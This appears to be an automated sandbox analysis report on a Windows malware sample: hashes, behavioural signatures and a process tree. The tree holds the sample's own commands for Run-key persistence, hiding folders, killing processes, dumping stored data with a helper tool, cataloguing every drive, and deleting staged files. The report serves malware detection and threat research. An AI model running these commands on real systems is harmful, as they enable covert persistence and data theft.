Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
23/11/2022, 09:46
Static task
static1
Behavioral task
behavioral1
Sample
688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe
Resource
win10v2004-20220901-en
General
-
Target
688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe
-
Size
32KB
-
MD5
ebd4ff5dd3b586aa279899a33dbc093b
-
SHA1
f861dc94a155c8a3d7952c79eca146ef61123c39
-
SHA256
688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e
-
SHA512
973561d45cc8e4b31a91f0daf4504f555b34c352fd0d26750b4e3693ee38161881908598e909beaf2c2616b394f2a9dbdf5091158ae7594c09448329ad96dcf6
-
SSDEEP
192:/Tmxc4FkYQPY7bKTpBVhUkEV/r0rwxk1VY+gkGG2KM/qqleJnJtM3gxU4kzk/xA0:/TAnuAApBVhUfo16oCGvjc8WlD94o6
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\Run Time = "c:\\users\\public\\windows\\m.e.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\Run Time2 = "c:\\users\\public\\windows\\dl.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\Run Time = "c:\\users\\public\\windows\\m.e.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\Run Time2 = "c:\\users\\public\\windows\\dl.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe -
Kills process with taskkill 3 IoCs
pid Process 1532 taskkill.exe 808 taskkill.exe 460 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe -
Modifies registry class 18 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 200000001a00eebbfe2300001000d09ad3fd8f23af46adb46c85480369c700000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" explorer.exe Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff explorer.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 808 taskkill.exe Token: SeDebugPrivilege 460 taskkill.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 1804 explorer.exe 1804 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1640 wrote to memory of 1736 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 28 PID 1640 wrote to memory of 1736 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 28 PID 1640 wrote to memory of 1736 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 28 PID 1640 wrote to memory of 1736 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 28 PID 1736 wrote to memory of 1532 1736 cmd.exe 30 PID 1736 wrote to memory of 1532 1736 cmd.exe 30 PID 1736 wrote to memory of 1532 1736 cmd.exe 30 PID 1736 wrote to memory of 1532 1736 cmd.exe 30 PID 1640 wrote to memory of 268 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 32 PID 1640 wrote to memory of 268 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 32 PID 1640 wrote to memory of 268 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 32 PID 1640 wrote to memory of 268 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 32 PID 1640 wrote to memory of 1320 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 35 PID 1640 wrote to memory of 1320 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 35 PID 1640 wrote to memory of 1320 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 35 PID 1640 wrote to memory of 1320 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 35 PID 1640 wrote to memory of 1824 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 34 PID 1640 wrote to memory of 1824 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 34 PID 1640 wrote to memory of 1824 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 34 PID 1640 wrote to memory of 1824 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 34 PID 1640 wrote to memory of 1804 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 40 PID 1640 wrote to memory of 1804 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 40 PID 1640 wrote to memory of 1804 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 40 PID 1640 wrote to memory of 1804 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 40 PID 1640 wrote to memory of 1680 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 38 PID 1640 wrote to memory of 1680 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 38 PID 1640 wrote to memory of 1680 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 38 PID 1640 wrote to memory of 1680 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 38 PID 1640 wrote to memory of 1560 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 41 PID 1640 wrote to memory of 1560 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 41 PID 1640 wrote to memory of 1560 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 41 PID 1640 wrote to memory of 1560 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 41 PID 1560 wrote to memory of 808 1560 cmd.exe 44 PID 1560 wrote to memory of 808 1560 cmd.exe 44 PID 1560 wrote to memory of 808 1560 cmd.exe 44 PID 1560 wrote to memory of 808 1560 cmd.exe 44 PID 268 wrote to memory of 832 268 cmd.exe 45 PID 268 wrote to memory of 832 268 cmd.exe 45 PID 268 wrote to memory of 832 268 cmd.exe 45 PID 268 wrote to memory of 832 268 cmd.exe 45 PID 1804 wrote to memory of 2032 1804 cmd.exe 48 PID 1804 wrote to memory of 2032 1804 cmd.exe 48 PID 1804 wrote to memory of 2032 1804 cmd.exe 48 PID 1804 wrote to memory of 2032 1804 cmd.exe 48 PID 1320 wrote to memory of 1764 1320 cmd.exe 46 PID 1320 wrote to memory of 1764 1320 cmd.exe 46 PID 1320 wrote to memory of 1764 1320 cmd.exe 46 PID 1320 wrote to memory of 1764 1320 cmd.exe 46 PID 1824 wrote to memory of 1708 1824 cmd.exe 47 PID 1824 wrote to memory of 1708 1824 cmd.exe 47 PID 1824 wrote to memory of 1708 1824 cmd.exe 47 PID 1824 wrote to memory of 1708 1824 cmd.exe 47 PID 1640 wrote to memory of 1340 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 49 PID 1640 wrote to memory of 1340 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 49 PID 1640 wrote to memory of 1340 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 49 PID 1640 wrote to memory of 1340 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 49 PID 1640 wrote to memory of 1536 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 50 PID 1640 wrote to memory of 1536 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 50 PID 1640 wrote to memory of 1536 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 50 PID 1640 wrote to memory of 1536 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 50 PID 1640 wrote to memory of 1332 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 51 PID 1640 wrote to memory of 1332 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 51 PID 1640 wrote to memory of 1332 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 51 PID 1640 wrote to memory of 1332 1640 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 51 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2032 attrib.exe 1648 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe"C:\Users\Admin\AppData\Local\Temp\688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im dl.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dl.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c explorer C:\users\public\windows\dl.exe2⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\SysWOW64\explorer.exeexplorer C:\users\public\windows\dl.exe3⤵PID:832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f3⤵
- Adds Run key to start application
PID:1708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f3⤵
- Adds Run key to start application
PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\users\public\windows\file.sys /stext C:\users\public\windows\Att\log.txt2⤵PID:1680
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +h +r +s c:\Users\public\windows2⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\SysWOW64\attrib.exeattrib +h +r +s c:\Users\public\windows3⤵
- Views/modifies file attributes
PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im file.sys2⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im file.sys3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c if exist C:\users\public\windows\windows.exe explorer C:\users\public\windows\windows.exe2⤵PID:1340
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir C:\ > C:\users\public\windows\Att\abban.txt2⤵PID:1536
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir B:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1332
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir A:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:968
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir D:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1268
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir R:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1360
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir Q:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1956
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir G:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1280
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir H:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1712
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir I:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1504
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir J:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:620
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir K:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:488
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir L:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1056
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir N:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1492
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir M:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:744
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir O:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1944
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir P:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2032
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir F:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1664
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir E:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1560
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir S:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:772
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir T:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1684
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir U:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1576
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir V:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:552
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir W:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1612
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir X:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1180
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir Y:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1648
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir z:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1420
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /y C:\users\public\windows\key.sys C:\users\public\windows\Att\key.txt2⤵PID:1184
-
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\pic.jpg2⤵PID:808
-
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\log.txt2⤵PID:1332
-
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\key.txt2⤵PID:936
-
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\abban.txt2⤵PID:1408
-
-
C:\Windows\SysWOW64\cmd.execmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f2⤵PID:1700
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f3⤵
- Adds Run key to start application
PID:988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f2⤵PID:944
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f3⤵
- Adds Run key to start application
PID:856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\users\public\windows\file.sys /stext C:\users\public\windows\Att\log.txt2⤵PID:1616
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +h +r +s c:\Users\public\windows2⤵PID:1340
-
C:\Windows\SysWOW64\attrib.exeattrib +h +r +s c:\Users\public\windows3⤵
- Views/modifies file attributes
PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im file.sys2⤵PID:1180
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im file.sys3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c if exist C:\users\public\windows\windows.exe explorer C:\users\public\windows\windows.exe2⤵PID:1800
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir C:\ > C:\users\public\windows\Att\abban.txt2⤵PID:1964
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir B:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1592
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir A:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:268
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir D:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:608
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir R:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1980
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir Q:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1660
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir G:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1944
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir H:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1408
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir I:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1580
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir J:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1444
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir K:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:552
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir L:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:988
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir N:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:820
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir M:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1664
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir O:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1784
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir P:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1612
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir F:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:328
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir S:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:268
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir E:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:880
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir T:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1764
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir U:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1064
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir V:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1632
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir W:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1424
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir X:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1948
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir z:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1980
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /y C:\users\public\windows\key.sys C:\users\public\windows\Att\key.txt2⤵PID:436
-
-
C:\Windows\SysWOW64\cmd.execmd /c dir Y:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1660
-
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\pic.jpg2⤵PID:1516
-
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\log.txt2⤵PID:1664
-
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\key.txt2⤵PID:1932
-
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\abban.txt2⤵PID:1532
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1804